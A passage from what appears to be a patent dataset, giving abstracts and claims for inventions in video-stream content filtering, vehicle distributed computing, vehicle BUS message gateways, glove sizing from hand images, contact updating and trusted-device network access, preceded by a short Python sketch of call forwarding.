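        """A call to the first number subsequently connects to the
        correlated second-area number."""
        return self.forwarding[dialed_number]

    def notification_caller_id(self, first_number):
        """Claim 5: caller ID for the notification call back to the device
        carries the assigned number and the reachable party's identity."""
        return first_number, self.identity.get(first_number)
```

On the device side (claim 13), the pair returned by `notification_caller_id` is what would be written into the contact list: the local first-area number stored against the identity of the party reachable at the second-area number.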
9,177 | 9,177 | 14,758,057 | 2,426 | The present invention relates to a method of transmitting a video stream, including: intercepting a video stream from a server to a video client; wherein the video client is on a user device; throttling onwards transmission of the video stream to the video client; analysing content within the video of the video stream; and performing an action in relation to the onward transmission to the video client as a result of the analysis of the content; wherein the throttling continues during analysis of the content. A system and software for transmitting a video stream are also described. | 1-28. (canceled) 29. A method of transmitting a video stream, including:
a) intercepting a video stream from a server to a video client; wherein the video client is on a user device; b) throttling onwards transmission of the video stream to the video client; c) analysing content within the video of the video stream; and d) performing an action in relation to the onward transmission to the video client as a result of the analysis of the content;
wherein the throttling continues during the analysis of the content. 30. A method as claimed in claim 29 wherein the step of interception occurs at a proxy device between the transmission from the server to the user device. 31. A method as claimed in claim 29 wherein the step of interception occurs at the user device. 32. A method as claimed in claim 29 wherein the throttling is caused by introducing a pause into onward transmission. 33. A method as claimed in claim 32 wherein a pause is introduced before transmission of every block of the video stream. 34. A method as claimed in claim 33 wherein the size of the block is determined by, at least, the video size and the video length. 35. A method as claimed in claim 34 wherein the size of the block (t) is calculated by the following formula:
t = (s * p) / (l - d)
where
t=Block Size (Bytes)
s=Video Size (Kilobytes)
l=Video Length (Seconds)
d=Delay (Seconds)
p=Pause (Milliseconds) 36. A method as claimed in claim 35 wherein the length of the delay (d) is determined by the video length. 37. A method as claimed in claim 29 wherein the action includes one of increasing the throttling of onward transmission of the video stream, decreasing the throttling of onward transmission of the video stream, or blocking onward transmission of the video stream. 38. A method as claimed in claim 29 wherein during initial interception of the video stream an initial block of a specified size of the video stream is transmitted onto the video client. 39. A method as claimed in claim 38, wherein the specified size of the initial block is at least the size of the header of the video. 40. A method as claimed in claim 29 wherein the step of analysing content includes analysing the content for pornographic content. 41. A method as claimed in claim 40 wherein the action includes blocking of the onward transmission of the video stream if the pornographic content as a result of the analysis is determined to exceed a specified threshold. 42. A method as claimed in claim 29 wherein the analysis utilises a static image analysis of at least some frames within the video. 43. A method as claimed in claim 29 further including the step of requesting a second transmission of the video from the server; wherein the analysis is performed on the content of the video within the second transmission. 44. A system for transmission of a video stream, including:
a first processor configured to throttle onwards transmission of a video stream to a video client on a user device and to perform an action in relation to the onward transmission to the video client as a result of analysis of content within the video of the video stream; a second processor configured to analyse the content within the video of the video stream; and a communications apparatus configured to intercept the video stream from the server to the video client on the user device; wherein the first processor is configured to continue throttling of the onward transmission of the video stream during analysis of the content of the video of the video stream by the second processor. 45. A system as claimed in claim 44, further including a further communications apparatus configured for receiving a second transmission of the video from the server; wherein the second processor analyses the content within the video of the second transmission. 46. A system as claimed in claim 44, wherein the first processor exists within the user device. 47. A system as claimed in claim 44, wherein the second processor exists within the user device. 48. A system as claimed in claim 44, wherein the first processor is configured to request analysis of the video from the second processor and wherein the second processor analyses the video in response to the request. 49. A system as claimed in claim 48, wherein the requests are stored within a database and wherein the second processor is configured to extract the requests from the database. 50. A processor configured for use with the system of claim 44, wherein the processor is configured to throttle onwards transmission of a video stream to a video client on a user device and to perform an action in relation to the onward transmission to the video client as a result of analysis of content of the video of the video stream. 51. 
A processor configured for use with the system of claim 44, wherein the processor is configured to analyse the content within the video of the video stream. 52. A user device configured for use with the system of claim 44. 53. An application program interface configured for providing access to the system of claim 44. 54. A user device configured for use with the system of claim 49. 55. An application program interface configured for providing access to the system of claim 49. 56. A computer program configured for performing the method of claim 29. | The present invention relates to a method of transmitting a video stream, including: intercepting a video stream from a server to a video client; wherein the video client is on a user device; throttling onwards transmission of the video stream to the video client; analysing content within the video of the video stream; and performing an action in relation to the onward transmission to the video client as a result of the analysis of the content; wherein the throttling continues during analysis of the content. A system and software for transmitting a video stream are also described. 1-28. (canceled) 29. A method of transmitting a video stream, including:
a) intercepting a video stream from a server to a video client; wherein the video client is on a user device; b) throttling onwards transmission of the video stream to the video client; c) analysing content within the video of the video stream; and d) performing an action in relation to the onward transmission to the video client as a result of the analysis of the content;
wherein the throttling continues during the analysis of the content. 30. A method as claimed in claim 29 wherein the step of interception occurs at a proxy device between the transmission from the server to the user device. 31. A method as claimed in claim 29 wherein the step of interception occurs at the user device. 32. A method as claimed in claim 29 wherein the throttling is caused by introducing a pause into onward transmission. 33. A method as claimed in claim 32 wherein a pause is introduced before transmission of every block of the video stream. 34. A method as claimed in claim 33 wherein the size of the block is determined by, at least, the video size and the video length. 35. A method as claimed in claim 34 wherein the size of the block (t) is calculated by the following formula:
t = (s * p) / (l - d)
where
t=Block Size (Bytes)
s=Video Size (Kilobytes)
l=Video Length (Seconds)
d=Delay (Seconds)
p=Pause (Milliseconds) 36. A method as claimed in claim 35 wherein the length of the delay (d) is determined by the video length. 37. A method as claimed in claim 29 wherein the action includes one of increasing the throttling of onward transmission of the video stream, decreasing the throttling of onward transmission of the video stream, or blocking onward transmission of the video stream. 38. A method as claimed in claim 29 wherein during initial interception of the video stream an initial block of a specified size of the video stream is transmitted onto the video client. 39. A method as claimed in claim 38, wherein the specified size of the initial block is at least the size of the header of the video. 40. A method as claimed in claim 29 wherein the step of analysing content includes analysing the content for pornographic content. 41. A method as claimed in claim 40 wherein the action includes blocking of the onward transmission of the video stream if the pornographic content as a result of the analysis is determined to exceed a specified threshold. 42. A method as claimed in claim 29 wherein the analysis utilises a static image analysis of at least some frames within the video. 43. A method as claimed in claim 29 further including the step of requesting a second transmission of the video from the server; wherein the analysis is performed on the content of the video within the second transmission. 44. A system for transmission of a video stream, including:
a first processor configured to throttle onwards transmission of a video stream to a video client on a user device and to perform an action in relation to the onward transmission to the video client as a result of analysis of content within the video of the video stream; a second processor configured to analyse the content within the video of the video stream; and a communications apparatus configured to intercept the video stream from the server to the video client on the user device; wherein the first processor is configured to continue throttling of the onward transmission of the video stream during analysis of the content of the video of the video stream by the second processor. 45. A system as claimed in claim 44, further including a further communications apparatus configured for receiving a second transmission of the video from the server; wherein the second processor analyses the content within the video of the second transmission. 46. A system as claimed in claim 44, wherein the first processor exists within the user device. 47. A system as claimed in claim 44, wherein the second processor exists within the user device. 48. A system as claimed in claim 44, wherein the first processor is configured to request analysis of the video from the second processor and wherein the second processor analyses the video in response to the request. 49. A system as claimed in claim 48, wherein the requests are stored within a database and wherein the second processor is configured to extract the requests from the database. 50. A processor configured for use with the system of claim 44, wherein the processor is configured to throttle onwards transmission of a video stream to a video client on a user device and to perform an action in relation to the onward transmission to the video client as a result of analysis of content of the video of the video stream. 51. 
A processor configured for use with the system of claim 44, wherein the processor is configured to analyse the content within the video of the video stream. 52. A user device configured for use with the system of claim 44. 53. An application program interface configured for providing access to the system of claim 44. 54. A user device configured for use with the system of claim 49. 55. An application program interface configured for providing access to the system of claim 49. 56. A computer program configured for performing the method of claim 29. | 2,400 |
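Claim 35's block-size formula, read as the fraction t = s·p/(l − d) (the only reading consistent with the stated units: kilobytes × milliseconds per second yields bytes), combines with the per-block pause of claims 32-33 into a simple throttling loop. The sketch below is an illustration under that unit assumption; the function names are invented, not from the patent.

```python
def block_size_bytes(video_size_kb, pause_ms, video_length_s, delay_s):
    """Claim 35: block size t = (s * p) / (l - d).

    Units check: s kilobytes = s*1000 bytes, spread over (l - d) seconds
    at one block per p milliseconds -> (l - d)*1000/p blocks, so each
    block is s*1000 / ((l - d)*1000/p) = s*p/(l - d) bytes.
    """
    return (video_size_kb * pause_ms) / (video_length_s - delay_s)


def throttled_blocks(total_bytes, block_size):
    """Claims 32-33: yield the length of each block; the sender pauses
    for the configured number of milliseconds before sending each one."""
    sent = 0
    while sent < total_bytes:
        chunk = min(block_size, total_bytes - sent)
        yield chunk
        sent += chunk
```

Worked example: a 5000 KB video of length 120 s with a 20 s delay and a 200 ms pause gives t = 5000 * 200 / 100 = 10,000 bytes per block; 5,000,000 bytes then take 500 blocks, and at one 200 ms pause per block the transmission fills exactly the remaining 100 s, which is how the throttling keeps the client fed while analysis continues.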
9,178 | 9,178 | 16,165,789 | 2,454 | A distributed computing network includes one or more vehicles, each vehicle configured to act as a node in the distributed computing network, and a remote server including a processor and a memory module storing one or more non-transient processor-readable instructions that when executed by the processor cause the remote server to establish a data connection with the one or more vehicles, predict a pattern-of-use of the one or more vehicles, determine a predicted current use of the one or more vehicles, and allocate a computational task to the one or more vehicles based on the predicted pattern-of-use and the predicted current use. | 1. A distributed computing network comprising:
one or more vehicles, each vehicle configured to act as a node in the distributed computing network; and a remote server comprising a processor and a memory module storing one or more non-transient processor-readable instructions that when executed by the processor cause the remote server to:
establish a data connection with the one or more vehicles;
predict a pattern-of-use of the one or more vehicles;
determine a predicted current use of the one or more vehicles; and
allocate a computational task to the one or more vehicles based on the predicted pattern-of-use and the predicted current use. 2. The distributed computing network of claim 1, wherein the predicted current use of the one or more vehicles is determined based on a current location of the one or more vehicles. 3. The distributed computing network of claim 1, wherein the predicted current use of the one or more vehicles is determined based on a status of one or more critical systems of the one or more vehicles. 4. The distributed computing network of claim 3, wherein the one or more critical systems include an adaptive cruise control system. 5. The distributed computing network of claim 3, wherein:
the one or more critical systems include a battery module that monitors a battery voltage and use rate of a vehicle battery; and the remote server allocates computational tasks to the one or more vehicles based on the battery voltage and use rate. 6. The distributed computing network of claim 1, wherein the computational task includes mining cryptocurrency. 7. The distributed computing network of claim 1, wherein at least one of the one or more vehicles is a ride-share vehicle and the pattern-of-use is predicted based on reservation information of the ride-share vehicle. 8. The distributed computing network of claim 1, wherein allocation of the computational task is further based on the processing capacity of the one or more vehicles. 9. The distributed computing network of claim 1, wherein users of the one or more vehicles receive an incentive to perform computational tasks allocated by the remote server. 10. A vehicle configured to act as a node in a distributed computing network, the vehicle comprising:
network interface hardware; a processor; and a memory module storing non-transient processor-readable instructions that when executed by the processor cause the vehicle to:
establish a communicative connection with a remote server;
predict a pattern-of-use;
predict a current use;
transmit the predicted pattern-of-use and the predicted current use to the remote server; and
receive a computational task from the remote server based on the predicted pattern-of-use and the predicted current use. 11. The vehicle of claim 10, wherein the non-transient processor-readable instructions further cause the vehicle to:
identify a current location of the vehicle; and transmit the current location of the vehicle to the remote server. 12. The vehicle of claim 10, wherein the current use is predicted based on the status of one or more critical systems of the vehicle. 13. The vehicle of claim 12, wherein the one or more critical systems include an adaptive cruise control system of the vehicle. 14. The vehicle of claim 12, wherein:
the one or more critical systems include a battery system that monitors a battery voltage and use rate of a vehicle battery; and the vehicle receives computational tasks based on the battery voltage and use rate. 15. The vehicle of claim 10, wherein the computational task includes mining cryptocurrency. 16. The vehicle of claim 10, wherein the vehicle is a ride-share vehicle and the pattern-of-use is predicted based on reservation information. 17. The vehicle of claim 10, wherein the vehicle accepts one or more incentives in exchange for performing computational tasks. 18. A method of allocating computational tasks in a distributed computing network comprising a remote server communicatively coupled between a grid computing network and one or more vehicles acting as nodes in the network, the method comprising:
establishing, by the remote server, a data connection with the one or more vehicles; predicting, by the remote server, a pattern-of-use of the one or more vehicles; predicting, by the remote server, a current use of the one or more vehicles; and allocating, by the remote server, a computational task to the one or more vehicles based on the predicted pattern-of-use and the predicted current use. 19. The method of claim 18, wherein users of the one or more vehicles receive an incentive to perform the allocated computational task. 20. The method of claim 19, wherein the computational task includes mining cryptocurrency. | 2,400 |
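The allocation step in this record's claims selects vehicles whose predicted pattern-of-use and predicted current use leave them free, with battery status (claim 5) as a further gate. A sketch of that selection logic, assuming illustrative field names and thresholds that do not come from the claims:

```python
# Hypothetical sketch of the server-side allocation in claims 1-9: assign a
# computational task only to vehicles predicted to be idle long enough and
# with a healthy battery. All keys and thresholds are illustrative.

def allocate(task, vehicles):
    """Return IDs of the vehicles the task is allocated to."""
    chosen = []
    for v in vehicles:
        idle_now = v["predicted_current_use"] == "parked"         # predicted current use
        free_window = v["predicted_idle_hours"] >= task["hours"]  # pattern-of-use
        healthy = v["battery_voltage"] >= 12.0                    # claim 5: battery status
        if idle_now and free_window and healthy:
            chosen.append(v["id"])
    return chosen

fleet = [
    {"id": "car-1", "predicted_current_use": "parked",  "predicted_idle_hours": 6, "battery_voltage": 12.6},
    {"id": "car-2", "predicted_current_use": "driving", "predicted_idle_hours": 0, "battery_voltage": 12.8},
    {"id": "car-3", "predicted_current_use": "parked",  "predicted_idle_hours": 1, "battery_voltage": 12.4},
]
nodes = allocate({"name": "hash-batch", "hours": 4}, fleet)   # -> ["car-1"]
```

Only `car-1` qualifies: `car-2` is predicted to be in use, and `car-3`'s predicted idle window is shorter than the task.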
9,179 | 9,179 | 14,940,985 | 2,492 | A system includes a processor configured to wirelessly broadcast a message obtained from a first originating vehicle BUS or controller, following a determination that the message was on a pre-approved list for broadcast and having encrypted the message utilizing a temporary random key generated for a message session. The system may include vehicle controllers, a gateway module, and vehicle BUSSES connecting the system controllers to the gateway module. The gateway module may include a memory storing a list of pre-approved message types and corresponding source types, and a processor configured to receive a message from one of the vehicle controllers over one of the vehicle BUSSES to determine if a message type and source type of the received message matches an element of the list. | 1. A system comprising:
a processor configured to: wirelessly broadcast a message obtained from a first originating vehicle BUS or controller, following a determination that the message was on a pre-approved list for broadcast and having encrypted the message utilizing a temporary random key generated for a message session. 2. The system of claim 1, wherein the message session comprises a single ignition cycle. 3. The system of claim 1, wherein the pre-approved list includes a designation of a message type and a source type which the processor determines match characteristics of the message prior to broadcast. 4. The system of claim 3, wherein the source type includes a first specific vehicle BUS. 5. The system of claim 3, wherein the source type includes a first specific vehicle controller. 6. The system of claim 3, wherein the pre-approved list includes a designation of destination in conjunction with the message type and source type, and wherein the broadcast includes delivery of the message to the designated destination. 7. The system of claim 6, wherein the destination is a second specific vehicle BUS or controller different from the first originating vehicle BUS or controller. 8. The system of claim 1, wherein the message is broadcast via a BLUETOOTH low energy transceiver. 9. The system of claim 1, wherein the processor is configured to deliver the temporary random key to a wireless device via a wireless connection different from a wireless connection used to wirelessly broadcast the message. 10. The system of claim 9, wherein the processor is configured to receive a request to engage a read/write mode, from an application pre-approved to request read/write, executing on the wireless device. 11. A computer implemented method comprising:
receiving a message from a vehicle BUS or vehicle controller; determining if a message source type and message type correspond to an element of a list of pre-designated message source types and corresponding message types; and upon determining that the message source type and message type correspond to the element, sending the message to a destination type associated with the element. 12. The method of claim 11, wherein the destination type includes a BLUETOOTH low energy (BTLE) chip and the method includes sending the message via a BTLE broadcast. 13. The method of claim 11, wherein the destination type includes a vehicle BUS or controller different from the vehicle BUS or controller from which the message was received. 14. The method of claim 11, further comprising:
generating a random key; and encrypting the message with the random key prior to sending the message. 15. The method of claim 14, further comprising:
sending the random key to a wireless device, over a wireless connection different from the destination type. 16. The method of claim 15, wherein the wireless connection includes BLUETOOTH. 17. The method of claim 15, wherein the wireless connection includes near-field communication. 18. A system comprising:
a plurality of vehicle system controllers; a gateway module; and a plurality of vehicle BUSSES connecting the system controllers to the gateway module; wherein the gateway module includes a memory storing a list of pre-approved message types and corresponding source types, and wherein the gateway module includes a processor configured to receive a message from one of the vehicle controllers over one of the vehicle BUSSES, to determine if a message type and source type of the received message matches an element of the list; and to deliver the message to a destination associated with the element which the message type and source type matches. 19. The system of claim 18, wherein the destination includes a BLUETOOTH low energy chip and wherein the processor is configured to deliver the message through a broadcast from the BLUETOOTH low energy chip. 20. The system of claim 18, wherein the processor is further configured to generate a random key, encrypt the message with the random key, and deliver the random key to a wireless device over a wireless connection established between the wireless device and the gateway module. | 2,400 |
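The gateway logic in this record checks each message's (source type, message type) pair against a pre-approved list and, if matched, encrypts it with a temporary per-session random key before delivery. A sketch of that filter, where XOR stands in for a real cipher and all names, BUS labels, and message types are invented for illustration:

```python
# Hypothetical sketch of the gateway in claims 11-20: forward a message only
# if its (source type, message type) pair is pre-approved, after encrypting it
# with a per-session random key (claim 2: one key per ignition cycle).
# XOR is a stand-in for a real cipher; all names are illustrative.
import secrets

APPROVED = {
    ("hs-can", "odometer"): "btle",        # destination per list element
    ("ms-can", "tire_pressure"): "btle",
}

SESSION_KEY = secrets.token_bytes(16)      # temporary random key for one session

def xor_cipher(data, key):
    """Toy symmetric cipher: XOR each byte with the repeating key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def gateway(source, msg_type, payload):
    """Return (destination, ciphertext) if approved, else None (dropped)."""
    dest = APPROVED.get((source, msg_type))
    if dest is None:
        return None
    return dest, xor_cipher(payload, SESSION_KEY)

sent = gateway("hs-can", "odometer", b"41235 km")     # approved -> broadcast
dropped = gateway("hs-can", "brake_cmd", b"engage")   # not on the list -> None
```

A wireless device holding `SESSION_KEY` (delivered over a separate connection, per claim 9) can recover the payload by applying the same XOR; messages not on the list never leave the gateway.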
9,180 | 9,180 | 15,004,229 | 2,483 | A kit to facilitate identifying at least one glove particularly suitable to be worn by a particular individual includes a backdrop having at least two visually-discernible calibration marks disposed thereon, a camera, a memory having stored therein characterizing parameters for a variety of different gloves, and a control circuit that operably couples to the latter. The control circuit presents to a kit user via a display an image of the particular individual's hand as placed on the backdrop, and then presents a plurality of user-placeable markers by which the kit user marks particular locations of the particular individual's hand. The control circuit then processes the image of the particular individual's hand as marked by the kit user and as a function of the two visually-discernible calibration marks to identify at least one glove that is particularly suitable to be worn by the particular individual. | 1. A kit to facilitate identifying at least one glove particularly suitable to be worn by a particular individual, the kit comprising:
a backdrop sized and configured to have a hand of the particular individual placed thereupon and further having at least two visually-discernable calibration marks disposed thereon; a camera; a memory having stored therein characterizing parameters for each of a variety of different gloves; a control circuit operably coupled to the memory and to the camera and configured to:
present to a kit user via a display an image of the particular individual's hand as placed on the backdrop;
present to the kit user via the display a plurality of user-placeable markers by which the kit user marks particular locations of the particular individual's hand;
process the image of the particular individual's hand as marked by the kit user and as a function of the two visually-discernable calibration marks to identify at least one glove that is particularly suitable to be worn by the particular individual. 2. The kit of claim 1 wherein the backdrop comprises a disposable sheet. 3. The kit of claim 1 wherein the backdrop has at least an outline of a human hand disposed thereon to serve as a hand-placement locator for the particular individual. 4. The kit of claim 3 wherein the at least two visually-discernable calibration marks are each disposed on an opposite side of the hand-placement locator. 5. The kit of claim 1 wherein control circuit, memory, and camera comprise integral parts of a shared platform. 6. The kit of claim 1 wherein the characterizing parameters for each of a variety of different gloves include at least some parameters selected from the group of parameters comprising:
glove size;
glove material;
glove material texture;
glove material thickness; and
additives. 7. The kit of claim 1 wherein the control circuit is further configured, while processing the image of the particular individual's hand as marked by the kit user and as a function of the two visually-discernable calibration marks to identify at least one glove that is particularly suitable to be worn by the particular individual, and via the display, to present an animated image of a hand-scanning process. 8. The kit of claim 1 wherein the particular locations of the particular individual's hand that the kit user is to mark with the user-placeable markers include tips of the digits of the particular individual's hand. 9. The kit of claim 8 wherein the particular locations of the particular individual's hand that the kit user is to mark with the user-placeable markers further include areas between the digits of the particular individual's hand. 10. The kit of claim 9 wherein the particular locations of the particular individual's hand that the kit user is to mark with the user-placeable markers further include the width of the palm as corresponds to the particular individual's hand. 11. The kit of claim 1 wherein the memory has further stored therein at least one glove preference as corresponds to the particular individual, and wherein the control circuit is further configured to identify the at least one glove that is particularly suitable to be worn by the particular individual as a function of the at least one glove preference. 12. The kit of claim 11 wherein the at least one glove preference comprises a preference with respect to at least one of:
a glove material;
a glove texture;
double gloving;
glove material thickness; and
a glove additive. 13. The kit of claim 1 wherein the control circuit is further configured to identify at least two different gloves that are particularly suitable to be worn by the particular individual. 14. The kit of claim 13 wherein the control circuit is further configured to present, via the display, the at least two different gloves that are particularly suitable to be worn by the particular individual. 15. The kit of claim 14 wherein the control circuit is further configured to present the at least two different gloves in a prioritized order such that a most suitable glove is presented first. 16. The kit of claim 14 wherein the control circuit is further configured to present a recommended glove size with each of the at least two different gloves. 17. The kit of claim 1 wherein the control circuit is further configured to provide the kit user with an opportunity to specify the different gloves that are available for the control circuit to consider when identifying the at least one glove that is particularly suitable to be worn by the particular individual. | 2,400 |
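The measurement step in this record's kit relies on two calibration marks printed a known real-world distance apart: their pixel separation in the image yields a pixels-to-millimetres scale, which converts the user-placed markers (fingertips, finger webs, palm edges) into real hand dimensions that can be matched against stored glove parameters. A sketch under that reading, with the mark distance, size table, and matching rule all invented for illustration:

```python
# Hypothetical sketch of the calibration and sizing in claims 1 and 8-10:
# two marks at a known separation give a mm-per-pixel scale, and the measured
# palm width is matched to the smallest stored glove size that fits.
# The 200 mm separation and size table are illustrative, not from the claims.

KNOWN_MARK_DISTANCE_MM = 200.0            # printed separation of the two marks

def mm_per_pixel(mark_a, mark_b):
    """Scale factor from the pixel distance between the calibration marks."""
    dx, dy = mark_b[0] - mark_a[0], mark_b[1] - mark_a[1]
    return KNOWN_MARK_DISTANCE_MM / (dx * dx + dy * dy) ** 0.5

def palm_width_mm(scale, palm_left, palm_right):
    """Real-world palm width from two user-placed markers (claim 10)."""
    return abs(palm_right[0] - palm_left[0]) * scale

GLOVE_SIZES = [("S", 80.0), ("M", 90.0), ("L", 100.0), ("XL", 110.0)]

def recommend(width_mm):
    """Smallest stored size whose maximum palm width fits the measured hand."""
    for size, max_width in GLOVE_SIZES:
        if width_mm <= max_width:
            return size
    return "XL"

scale = mm_per_pixel((100, 500), (900, 500))   # marks 800 px apart -> 0.25 mm/px
size = recommend(palm_width_mm(scale, (300, 250), (650, 250)))
```

With the marks 800 pixels apart, a 350-pixel palm span measures 87.5 mm, which the table maps to size "M"; stored per-user preferences (claims 11-12) would then filter the candidate gloves further.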
9,181 | 9,181 | 14,572,449 | 2,451 | Methods, devices and program products are provided to track communications event (CE) identifiers associated with the communications events for a device. The method determines whether communications events are associated with a common CE identifier, and performs a contact update utilizing content from at least one communications event associated with the common CE identifier to update a contact. The device comprises a processor, a user interface, and a local storage medium. The device determines whether communications events are associated with a common CE identifier and performs a contact update utilizing content from at least one of the communications events associated with the common CE identifier to update the contact. The computer program product comprises a non-signal computer readable storage medium comprising computer executable code to track CE identifiers associated with the communications events for a device and a contact update. | 1. A method, comprising:
tracking communications event (CE) identifiers associated with the communications events for a device; determining whether a select number of communications events are associated with a common CE identifier; and performing a contact update based on the determining, the contact update utilizing content from at least one of the communications events associated with the common CE identifier to update a contact. 2. The method of claim 1, wherein the performing includes generating the contact as a temporary contact on the device based on the content of the communications events associated with the common CE identifier. 3. The method of claim 1, further comprising presenting an update-contact option, through a user interface of the device, to perform the contact update. 4. The method of claim 1, further comprising presenting an update-contact option, through a user interface of the device, to modify an existing contact based on the determining. 5. The method of claim 1, wherein the CE identifiers indicate a source for communications events received by the device and a destination for communications events sent from the device. 6. The method of claim 1, further comprising presenting a temporary contact option, through the user interface of the device, to designate the contact as a temporary contact; and automatically deleting the temporary contact after an occurrence of a term indicator, the term indicator representing a predetermined amount of time passing without using the temporary contact. 7. The method of claim 1, further comprising storing the content in a local storage medium local to the device; and deleting the content, from the local storage medium, based on a term indicator. 8. The method of claim 7, wherein the indicator includes a lifetime marker, the method further comprising deleting the temporary contact, from the local storage medium, after expiration of the lifetime marker. 9. 
The method of claim 1, wherein the content is content selected from the group consisting of incoming communications content received by the device and outgoing communications content sent from the device. 10. The method of claim 1, wherein the performing comprises analyzing the content to identify content selected from the group consisting of a telephone number, email address, home address, business address, and name associated with the communications event. 11. A device, comprising:
a processor; a user interface generated via the processor; a local storage medium storing program instructions accessible by the processor; wherein, responsive to execution of the program instructions, the processor:
tracks communications event (CE) identifiers associated with the communications events;
determines whether a select number of communications events are associated with a common CE identifier; and
performs a contact update based on the determination, the contact update utilizing content from at least one of the communications events associated with the common CE identifier to update a contact. 12. The device of claim 11, wherein the local storage medium stores a CE identification log including the CE identifiers and a count of a number of communications events that are tracked that are associated with the CE identifiers. 13. The device of claim 11, wherein the processor generates, as the contact update, a temporary contact saved in the local storage medium based on the content of the communications events associated with the common CE identifier. 14. The device of claim 11, wherein the CE identifiers indicate a source for communications events received by the device and a destination for communications events sent from the device. 15. The device of claim 11, wherein the user interface presents a temporary contact option to designate the contact as a temporary contact. 16. The device of claim 15, wherein the processor automatically deletes the temporary contact after an occurrence of a term indicator, the term indicator representing a predetermined amount of time passing without using the temporary contact. 17. The device of claim 11, wherein the local storage medium stores the content and the processor deletes the content, from the local storage medium, based on a term indicator. 18. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to perform:
track communications event (CE) identifiers associated with the communications events for a device; determine whether a select number of communications events are associated with a common CE identifier; and perform a contact update based on the determining, the contact update utilizing content from at least one of the communications events associated with the common CE identifier to update a contact. 19. The computer program product of claim 18, further comprising a temporary contact generated based on the content of at least one of the communications events associated with the common CE identifier. 20. The computer program product of claim 17, further comprising a CE identification log storing the CE identifiers and a count of a number of communications events that are tracked that are associated with the CE identifiers. | Methods, devices and program products are provided to track communications event (CE) identifiers associated with the communications events for a device. The method determines whether communications events are associated with a common CE identifier, and performs a contact update utilizing content from at least one communications event associated with the common CE identifier to update a contact. The device comprises a processor, a user interface, and a local storage medium. The device determines whether communications events are associated with a common CE identifier and performs a contact update utilizing content from at least one of the communications events associated with the common CE identifier to update the contact. The computer program product comprises a non-signal computer readable storage medium comprising computer executable code to track CE identifiers associated with the communications events for a device and a contact update.1. A method, comprising:
tracking communications event (CE) identifiers associated with the communications events for a device; determining whether a select number of communications events are associated with a common CE identifier; and performing a contact update based on the determining, the contact update utilizing content from at least one of the communications events associated with the common CE identifier to update a contact. 2. The method of claim 1, wherein the performing includes generating the contact as a temporary contact on the device based on the content of the communications events associated with the common CE identifier. 3. The method of claim 1, further comprising presenting an update-contact option, through a user interface of the device, to perform the contact update. 4. The method of claim 1, further comprising presenting an update-contact option, through a user interface of the device, to modify an existing contact based on the determining. 5. The method of claim 1, wherein the CE identifiers indicate a source for communications events received by the device and a destination for communications events sent from the device. 6. The method of claim 1, further comprising presenting a temporary contact option, through the user interface of the device, to designate the contact as a temporary contact; and automatically deleting the temporary contact after an occurrence of a term indicator, the term indicator representing a predetermined amount of time passing without using the temporary contact. 7. The method of claim 1, further comprising storing the content in a local storage medium local to the device; and deleting the content, from the local storage medium, based on a term indicator. 8. The method of claim 7, wherein the indicator includes a lifetime marker, the method further comprising deleting the temporary contact, from the local storage medium, after expiration of the lifetime marker. 9. 
The method of claim 1, wherein the content is content selected from the group consisting of incoming communications content received by the device and outgoing communications content sent from the device. 10. The method of claim 1, wherein the performing comprises analyzing the content to identify content selected from the group consisting of a telephone number, email address, home address, business address, and name associated with the communications event. 11. A device, comprising:
a processor; a user interface generated via the processor; a local storage medium storing program instructions accessible by the processor; wherein, responsive to execution of the program instructions, the processor:
tracks communications event (CE) identifiers associated with the communications events;
determines whether a select number of communications events are associated with a common CE identifier; and
performs a contact update based on the determination, the contact update utilizing content from at least one of the communications events associated with the common CE identifier to update a contact. 12. The device of claim 11, wherein the local storage medium stores a CE identification log including the CE identifiers and a count of a number of communications events that are tracked that are associated with the CE identifiers. 13. The device of claim 11, wherein the processor generates, as the contact update, a temporary contact saved in the local storage medium based on the content of the communications events associated with the common CE identifier. 14. The device of claim 11, wherein the CE identifiers indicate a source for communications events received by the device and a destination for communications events sent from the device. 15. The device of claim 11, wherein the user interface presents a temporary contact option to designate the contact as a temporary contact. 16. The device of claim 15, wherein the processor automatically deletes the temporary contact after an occurrence of a term indicator, the term indicator representing a predetermined amount of time passing without using the temporary contact. 17. The device of claim 11, wherein the local storage medium stores the content and the processor deletes the content, from the local storage medium, based on a term indicator. 18. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to perform:
track communications event (CE) identifiers associated with the communications events for a device; determine whether a select number of communications events are associated with a common CE identifier; and perform a contact update based on the determining, the contact update utilizing content from at least one of the communications events associated with the common CE identifier to update a contact. 19. The computer program product of claim 18, further comprising a temporary contact generated based on the content of at least one of the communications events associated with the common CE identifier. 20. The computer program product of claim 17, further comprising a CE identification log storing the CE identifiers and a count of a number of communications events that are tracked that are associated with the CE identifiers. | 2,400 |
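The contact-update method claimed above can be illustrated with a minimal Python sketch. The "select number" of communications events is not specified in the claims, so a threshold of three is an assumption, as are the `ContactTracker` name and the shape of the content dictionary; this is a sketch of the claimed flow, not the patented implementation.

```python
from dataclasses import dataclass, field

# Assumed "select number" of events sharing a CE identifier that
# triggers a contact update (the claims leave this unspecified).
TEMP_CONTACT_THRESHOLD = 3

@dataclass
class ContactTracker:
    counts: dict = field(default_factory=dict)    # CE identifier -> event count
    contacts: dict = field(default_factory=dict)  # CE identifier -> temporary contact

    def record_event(self, ce_id: str, content: dict):
        # Track the CE identifier and count how many events share it.
        self.counts[ce_id] = self.counts.get(ce_id, 0) + 1
        # Once a select number of events share the identifier, perform
        # the contact update using content from one of those events.
        if self.counts[ce_id] >= TEMP_CONTACT_THRESHOLD and ce_id not in self.contacts:
            self.contacts[ce_id] = {
                "name": content.get("name"),
                "email": content.get("email"),
                "temporary": True,  # claim 2: generated as a temporary contact
            }
        return self.contacts.get(ce_id)
```

A term-indicator sweep (claims 6-7) would simply delete entries from `contacts` after the configured lifetime expires.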
9,182 | 9,182 | 14,921,644 | 2,431 | Methods and systems are disclosed to enable a user device to gain access to a network via a trusted device (e.g., a network device). The network device can obtain a user device identifier from the user device and can transmit the user device identifier along with a network device identifier to a computing device (e.g., a server associated with a service provider). The server can determine if the user device should be permitted to access the network. The server can return the results of the determination to the network device and/or the user device. If the determination is that the user device should be permitted to access the network, the user device can also receive network credentials. The user device can access the network with the network credentials. | 1. A method comprising:
